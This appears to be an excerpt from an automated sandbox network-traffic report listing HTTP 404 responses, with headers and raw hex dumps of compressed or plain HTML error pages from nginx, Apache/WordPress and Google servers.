Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:54:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: W/"afe-6098b1f8c138d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:54:58 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: "afe-6098b1f8c138d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 6d 77 e3 36 b2 35 fa d9 5e eb f9 0f 68 f6 4d da ee 98 2f a2 de 65 c9 39 49 4f e7 4c ce 4a 26 b9 e9 64 66 9d 93 ce f2 82 c8 a2 88 36 08 30 00 68 59 f1 f8 bf df 02 49 49 94 4c d9 ee 97 cc 99 e7 3a 69 11 40 55 ed da b5 6b 4f 9f fd e5 87 57 3f ff f7 8f af 49 6a 32 7e 71 3c b5 1f 12 33 35 73 b8 51 0e e1 54 2c 66 0e 08 f7 97 37 0e c9 15 24 ec 66 e6 c8 c5 04 d3 4d ae 27 be 2f 17 b9 97 81 2f f4 73 c7 56 03 8d 2f 8e 8f a6 19 18 4a a2 94 2a 0d 66 e6 fc f2 f3 37 ee c8 21 fe c5 f1 3a 24 68 06 33 e7 9a c1 32 97 ca 38 24 92 c2 80 c0 d4 25 8b 4d 3a 8b e1 9a 45 e0 96 97 33 c2 04 33 8c 72 57 47 94 c3 ac e3 05 67 24 a3 37 2c 2b b2 f5 d3 1a 9b 33 71 45 14 f0 99 93 2b 99 30 0e 0e 49 91 f3 cc f1 fd 45 96 2f 3c a9 16 fe 4d 22 fc 4e 55 71 84 7f 8d 1a 9d 22 97 a8 30 84 21 9d 75 e5 7a ce 6e 54 cc 41 33 a4 a9 98 54 1e 13 fe 32 77 6b da be 49 21 03 ed 0b 29 05 f3 59 46 17 78 49 e8 b5 c5 f1 f0 67 d3 0c db e9 48 b1 dc 5c c4 32 2a 32 2c f5 d6 87 d7 1c ca 7b c4 a9 d6 7f 43 79 c8 8c 3c 21 e9 0b f2 82 ac 40 bb ef 34 79 a7 2f 69 64 d8 35 e0 e9 c5 d4 af 1b 55 43 1a 66 38 5c fc 88 c4 88 90 86 24 b2 10 31 f9 fc f9 28 ec 74 ce c9 ee 68 53 bf 4a 46 3d 8f a6 cf 5c 97 7c c5 39 ae 80 fc 20 80 bc 79 fd 03 e9 79 03 af 4f 5c 42 99 d4 20 bd 48 66 c4 75 6d 9b e6 66 95 9c 4b a3 1b 7b 15 92 89 18 6e 6a 25 9a a9 0b 10 a0 a8 91 aa 91 bd d7 f2 e4 ab 6f 7f c0 ef 69 d5 7b 8d 51 0d 48 cc 2a 47 14 9a e7 9c 45 d4 30 29 7c 1e 7f f1 4e db 0d 96 32 61 ac 64 8a 5e c1 2d 51 a7 54 e4 d6 f9 8f b2 d9 8d 71 26 f5 8a df fa 6f fd 2a c5 da c4 39 73 fe 63 a1 68 9e 3a 93 5f 31 d9 36 c1 cc af 15 fa 3b 52 45 36 ff 8e 69 63 73 58 bc 03 70 cf 25 6f 7d 31 fa 83 bd f5 9f cf 37 a5 bc 2a 65 06 32 8b 52 ef 74 a7 8f 7d ff 16 e3 4f eb f0 9c 6f d3 73 a9 99 15 c1 99 74 ce 1c 2b 30 16 ff 55 e2 a7 6a f8 18 14 a6 09 14 e5 db 27 a4 d6 73 6d 7a df 9d 7d 28 ff 7d a4 e6 14 e1 66 8a bf a1 6f bf b1 be b5 71 05 d7 4c 16 fa 29 3c 1b 0c 7f 6b 72 fc 41 2d a8 60 7f 94 96 79 a2 ce 72 b7 a4 26 b6 9b 89 ef 31 54 d6 2c 07 70 fe 5b 16 8a fc 08 0a 1d 49 39 b1 bb 20 7f 81 48 56 96 3f 73 0a c5 1f 5d 4a 93 f6 3f 60 fe 23 5d c0 7b 29 bb 84 79 5e d5 3c a1 5b 55 63 fd 22 be a3 62 51 d8 c2 89 03 c2 fd e5 8d 7d d4 3f 52 65 7e 48 9c c9 ed 93 24 c3 d6 b8 4a c0 11 9c b9 02 1a 47 aa c8 e6 4f 2c ae d9 6f eb ec 26 9d bb 3d 35 de 58 f8 a7 ed 6f 4d e6 69 aa 7f a2 05 b7 ca 98 17 76 98 14 d4 53 75 dc b1 de 1d 3a f9 f8 e8 68 ea 57 34 2e ec f9 99 eb 92 af 38 27 4c 90 1f 04 90 37 af 7f 20 ae 7b 71 7c 3c ad 73 96 4c c4 72 e9 5d 2e 23 4a 66 a4 79 fb Data Ascii: 1faamw65^hM/e9IOLJ&df
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 6d 77 e3 36 b2 35 fa d9 5e eb f9 0f 68 f6 4d da ee 98 2f a2 de 65 c9 39 49 4f e7 4c ce 4a 26 b9 e9 64 66 9d 93 ce f2 82 c8 a2 88 36 08 30 00 68 59 f1 f8 bf df 02 49 49 94 4c d9 ee 97 cc 99 e7 3a 69 11 40 55 ed da b5 6b 4f 9f fd e5 87 57 3f ff f7 8f af 49 6a 32 7e 71 3c b5 1f 12 33 35 73 b8 51 0e e1 54 2c 66 0e 08 f7 97 37 0e c9 15 24 ec 66 e6 c8 c5 04 d3 4d ae 27 be 2f 17 b9 97 81 2f f4 73 c7 56 03 8d 2f 8e 8f a6 19 18 4a a2 94 2a 0d 66 e6 fc f2 f3 37 ee c8 21 fe c5 f1 3a 24 68 06 33 e7 9a c1 32 97 ca 38 24 92 c2 80 c0 d4 25 8b 4d 3a 8b e1 9a 45 e0 96 97 33 c2 04 33 8c 72 57 47 94 c3 ac e3 05 67 24 a3 37 2c 2b b2 f5 d3 1a 9b 33 71 45 14 f0 99 93 2b 99 30 0e 0e 49 91 f3 cc f1 fd 45 96 2f 3c a9 16 fe 4d 22 fc 4e 55 71 84 7f 8d 1a 9d 22 97 a8 30 84 21 9d 75 e5 7a ce 6e 54 cc 41 33 a4 a9 98 54 1e 13 fe 32 77 6b da be 49 21 03 ed 0b 29 05 f3 59 46 17 78 49 e8 b5 c5 f1 f0 67 d3 0c db e9 48 b1 dc 5c c4 32 2a 32 2c f5 d6 87 d7 1c ca 7b c4 a9 d6 7f 43 79 c8 8c 3c 21 e9 0b f2 82 ac 40 bb ef 34 79 a7 2f 69 64 d8 35 e0 e9 c5 d4 af 1b 55 43 1a 66 38 5c fc 88 c4 88 90 86 24 b2 10 31 f9 fc f9 28 ec 74 ce c9 ee 68 53 bf 4a 46 3d 8f a6 cf 5c 97 7c c5 39 ae 80 fc 20 80 bc 79 fd 03 e9 79 03 af 4f 5c 42 99 d4 20 bd 48 66 c4 75 6d 9b e6 66 95 9c 4b a3 1b 7b 15 92 89 18 6e 6a 25 9a a9 0b 10 a0 a8 91 aa 91 bd d7 f2 e4 ab 6f 7f c0 ef 69 d5 7b 8d 51 0d 48 cc 2a 47 14 9a e7 9c 45 d4 30 29 7c 1e 7f f1 4e db 0d 96 32 61 ac 64 8a 5e c1 2d 51 a7 54 e4 d6 f9 8f b2 d9 8d 71 26 f5 8a df fa 6f fd 2a c5 da c4 39 73 fe 63 a1 68 9e 3a 93 5f 31 d9 36 c1 cc af 15 fa 3b 52 45 36 ff 8e 69 63 73 58 bc 03 70 cf 25 6f 7d 31 fa 83 bd f5 9f cf 37 a5 bc 2a 65 06 32 8b 52 ef 74 a7 8f 7d ff 16 e3 4f eb f0 9c 6f d3 73 a9 99 15 c1 99 74 ce 1c 2b 30 16 ff 55 e2 a7 6a f8 18 14 a6 09 14 e5 db 27 a4 d6 73 6d 7a df 9d 7d 28 ff 7d a4 e6 14 e1 66 8a bf a1 6f bf b1 be b5 71 05 d7 4c 16 fa 29 3c 1b 0c 7f 6b 72 fc 41 2d a8 60 7f 94 96 79 a2 ce 72 b7 a4 26 b6 9b 89 ef 31 54 d6 2c 07 70 fe 5b 16 8a fc 08 0a 1d 49 39 b1 bb 20 7f 81 48 56 96 3f 73 0a c5 1f 5d 4a 93 f6 3f 60 fe 23 5d c0 7b 29 bb 84 79 5e d5 3c a1 5b 55 63 fd 22 be a3 62 51 d8 c2 89 03 c2 fd e5 8d 7d d4 3f 52 65 7e 48 9c c9 ed 93 24 c3 d6 b8 4a c0 11 9c b9 02 1a 47 aa c8 e6 4f 2c ae d9 6f eb ec 26 9d bb 3d 35 de 58 f8 a7 ed 6f 4d e6 69 aa 7f a2 05 b7 ca 98 17 76 98 14 d4 53 75 dc b1 de 1d 3a f9 f8 e8 68 ea 57 34 2e ec f9 99 eb 92 af 38 27 4c 90 1f 04 90 37 af 7f 20 ae 7b 71 7c 3c ad 73 96 4c c4 72 e9 5d 2e 23 4a 66 a4 79 fb Data Ascii: 1faamw65^hM/e9IOLJ&df
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:44 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:46 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:49 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 